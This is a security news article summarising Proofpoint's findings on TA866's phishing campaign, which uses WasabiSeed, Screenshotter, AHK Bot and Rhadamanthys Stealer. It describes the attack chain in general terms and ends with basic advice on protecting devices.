Proofpoint researchers have discovered a new hacking campaign executed by a hacker group named TA866. With known links to Russia, TA866 is an advanced hacking group that has the ability to perform well-organized attacks on a large scale. This stems from their ability to acquire attack tools from different sources and customize them according to each target.
The attack, which began in December 2022, has continued into 2023. It primarily targets victims in the United States and Germany and aims to steal their cryptocurrency wallets, saved account credentials, web browser cookies, and personal information.
Attack methodology
The attack chain begins with an email containing malicious attachments or a URL that points to a malicious website housing WasabiSeed and Screenshotter malware. The following steps are executed in succession.
1. Phishing email
A user receives an email with a URL leading to a Traffic Distribution System (TDS) named 404 TDS, which prompts the user to download a malicious JavaScript file.
2. MSI package installed
If the user runs the dangerous JavaScript file by double-clicking it, it will install an MSI package containing the WasabiSeed installer.
The MSI package will then perform two actions:
- Cause the infected user device to download and install additional payloads if requested by the attacker
- Download and run another program known as Screenshotter
Screenshotter, a popular malware program for taking screen captures of infected devices, has many variants written in different programming languages. Screenshotter works by taking screen captures of a victim’s device and sending the files to the attacker’s command and control server (C&C).
3. Additional payloads downloaded
Next, the attackers will check the screen capture manually to determine their next steps. These steps could include:
- Loading Screenshottter onto the victim’s device again if they are unsatisfied with the received screen captures
- Infecting the victim’s device with AHK Bot
AHK Bot is another malware program that has the ability to introduce additional payloads into the victim device, such as:
- Domain profiler: To extract the infected device’s Active Directory (AD) information and send them back to the attacker server
- Stealer loader: This script will install a stealer malware and load it into the device’s memory (Proofpoint researchers observed Rhadamanthys Stealer malware being used in the most recent campaign)
How to prevent Screenshotter malware from infecting your device
To protect yourself against Screenshotter and similar types of malware, follow these precautions:
- Do not open email attachments received from unknown email addresses
- Do not click on links contained in suspicious emails
- Install a personal firewall on your device to monitor all ongoing and incoming connections
- Keep your operating system, web browsers, and installed programs up to date
- Install a reputable antimalware program
Phishing emails are still the primary vehicle used by hackers to infect targets with malware. Fortunately, following the recommendations in this post should be enough to protect your device from such attacks.
